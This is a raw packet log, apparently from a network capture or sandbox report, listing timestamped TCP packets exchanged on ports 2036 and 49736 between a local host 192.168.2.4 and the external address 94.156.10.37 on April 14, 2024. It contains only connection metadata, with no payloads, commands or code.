Apr 14, 2024 08:45:12.046037912 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046058893 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046075106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046094894 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046113968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046134949 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046153069 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046171904 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046190977 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046206951 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046227932 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046248913 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046278000 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046286106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046315908 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046324015 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046356916 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046363115 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046375990 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046401024 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046420097 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046438932 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046458960 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046475887 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046495914 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046514034 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046534061 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046550989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046571016 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046591043 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046608925 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046629906 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046649933 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046668053 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046686888 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046705961 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046725035 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046744108 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046761990 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046782017 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046799898 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046819925 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046840906 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046858072 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046883106 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046899080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046915054 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046937943 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046957016 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046994925 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058012009 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058079004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058159113 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058352947 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058358908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058397055 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058419943 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058434010 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058459997 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058473110 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058490038 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058511972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058532953 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058549881 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058569908 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058587074 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058598995 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058624983 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058645964 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058662891 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058681965 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058700085 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058718920 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058738947 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058769941 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058775902 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058792114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058814049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058845043 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058854103 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058868885 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058891058 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058901072 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058928967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058947086 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.058968067 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.058985949 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059005976 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059020042 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059045076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059062004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059082031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059112072 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059118986 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059132099 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059158087 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059174061 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059196949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059214115 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059235096 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059266090 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059272051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059287071 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059309959 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059323072 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059348106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059364080 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059386015 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059401989 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059423923 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059437037 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059462070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059478045 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059499025 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059516907 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059536934 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059552908 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059575081 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059595108 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059612036 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059631109 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059649944 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059664965 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059688091 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059703112 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059726954 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059742928 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059765100 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059778929 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059803009 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059822083 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059840918 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059863091 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059878111 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059900999 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059916973 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059927940 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.059953928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059974909 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.059994936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060029984 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060033083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060070992 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060072899 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060108900 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060110092 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060129881 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060147047 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060168028 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060184002 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060235977 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060256004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060275078 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060290098 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060313940 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060348988 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060350895 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060384989 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060389996 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060404062 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060429096 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060444117 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060467005 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060478926 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060504913 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.060523987 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.060559988 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.272927999 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.272995949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273036003 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273041010 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273076057 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273082972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273102045 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273180008 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273194075 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273222923 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273242950 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273261070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273282051 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273298979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273319006 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273336887 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273358107 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273375988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273417950 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.273437023 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273462057 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.273489952 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277403116 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277475119 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277515888 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277527094 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277554989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277558088 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277585030 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277594090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277617931 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277631998 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277646065 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277672052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277694941 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277710915 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277734995 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277750015 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277772903 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277787924 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277803898 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277827024 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277846098 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277868032 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277887106 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277908087 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277923107 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.277951002 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.277960062 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.278207064 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.499584913 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.499655962 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.499748945 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.499771118 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.499797106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.499835968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.499851942 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.499876022 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.499917984 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.499927998 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.499955893 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.499994993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.500006914 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.500035048 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.500073910 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.500083923 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504013062 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504080057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504084110 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504122972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504167080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504192114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504204988 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504259109 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504272938 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504311085 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504348993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504362106 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504390001 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504429102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504440069 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504470110 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504507065 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504523039 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504544973 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504581928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504610062 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504625082 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504664898 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504698038 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504703045 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504740953 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504756927 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504777908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504813910 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504827023 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504852057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504889965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504906893 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.504930019 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504966021 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.504980087 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505003929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505044937 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505059004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505083084 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505125999 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505163908 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505187035 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505193949 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505220890 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505232096 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505244017 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505280018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505292892 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505319118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505351067 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505359888 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505398989 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505414963 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505438089 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505475044 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505487919 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505511999 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505551100 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505569935 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505587101 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505624056 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505652905 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505661964 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505698919 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505714893 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505736113 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505774975 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505789042 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505812883 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505850077 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505877972 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505896091 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505934954 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.505966902 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.505970001 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506009102 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506028891 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506047010 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506088018 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506123066 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506160975 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506197929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506234884 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506273031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506284952 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506309986 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506349087 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506364107 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506386042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506416082 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.506424904 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.506462097 CEST	2036	49736	94.156.10.37	192.168.2.4
